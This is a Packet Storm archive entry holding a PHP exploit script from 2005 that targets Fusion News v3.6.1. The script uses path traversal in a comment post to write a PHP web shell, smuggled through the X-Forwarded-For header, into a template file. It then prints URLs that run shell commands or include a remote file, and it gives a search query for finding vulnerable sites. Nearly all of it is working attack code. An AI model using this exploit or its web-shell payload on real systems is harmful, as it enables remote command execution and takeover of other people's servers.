fusion_v3.6.1_exploit.txt

2005-05-27T00:00:00
ID PACKETSTORM:37320
Type packetstorm
Reporter nst.void.ru
Modified 2005-05-27T00:00:00

Description

                                        
                                            `<?  
$copyr = "  
!!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!!  
  
oooo...oooo.oooooooo8.ooooooooooo  
.8888o..88.888........88..888..88  
.88.888o88..888oooooo.....888  
.88...8888.........888....888  
o88o....88.o88oooo888....o888o  
********************************  
**** Network security team *****  
********* nst.void.ru **********  
********************************  
* Title: Fusion News v3.6.1  
* Date: 15.05.2005  
********************************  
  
Remote shell exploit.  
  
Google:  
allintitle:f u s i o n : n e w s : m a n a g e m e n t : s y s t e m  
  
Script owner: www.fusionphp.net  
  
Greetz to: GHC, RST, LWB, AntiChat, VOID, Web-Hack, Securitylab, Security.nnov, Securityfocus  
  
Visit all our friends:  
Rus:  
ghc.ru  
rst.void.ru  
lwb57.org  
antichat.ru  
void.ru  
web-hack.ru  
securitylab.ru  
security.nnov.ru  
Eng:  
securityfocus.com  
  
Greentz to Ch0k37 from gh0sts, which wants to purchase this exploit but he was too greedy.  
  
!!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!!  
  
*** Public: 17.05.2005 ***  
";  
  
# CONFIG (example: http://www.site.com/news/)  
$host = "127.0.0.1"; # address - example: www.site.com  
$folder = "folder/to/fusion"; # folder - example: news  
# END OF CONFIG  
  
  
$fp = fsockopen($host, 80);  
$data = "name=nst&email=&fullnews=nst&chars=297&com_Submit=Submit&pass=";  
$out = "POST /$folder/comments.php?mid=post&id=/../../templates/headline_temp HTTP/1.1\r\n";  
$out.= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*\r\n";  
$out.= "Referer: http://$host/\r\n";  
$out.= "Accept-Language: ru\r\n";  
$out.= "X-FORWARDED-FOR: <?@include(\$_GET[nst_inc]);@passthru(\$_GET[nst_cmd]);?>\r\n";  
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";  
$out.= "Accept-Encoding: gzip, deflate\r\n";  
$out.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n";  
$out.= "Host: $host\r\n";  
$out.= "Content-Length: 64\r\n";  
$out.= "Connection: Keep-Alive\r\n";  
$out.= "Cache-Control: no-cache\r\n";  
$out.= "\r\n";  
$out.= "name=test&email=&fullnews=test&chars=297&com_Submit=Submit&pass=";  
fputs($fp,$out);  
while(!feof($fp)){  
fgets($fp, 128);  
}  
print "<pre>";  
print $copyr;  
print "\r\n\r\n <b>  
Result:  
  
http://$host/$folder/templates/headline_temp.php?nst_inc=http://YOUR_FILE \r\n";  
print "http://$host/$folder/templates/headline_temp.php?nst_cmd=ls -la";  
?>`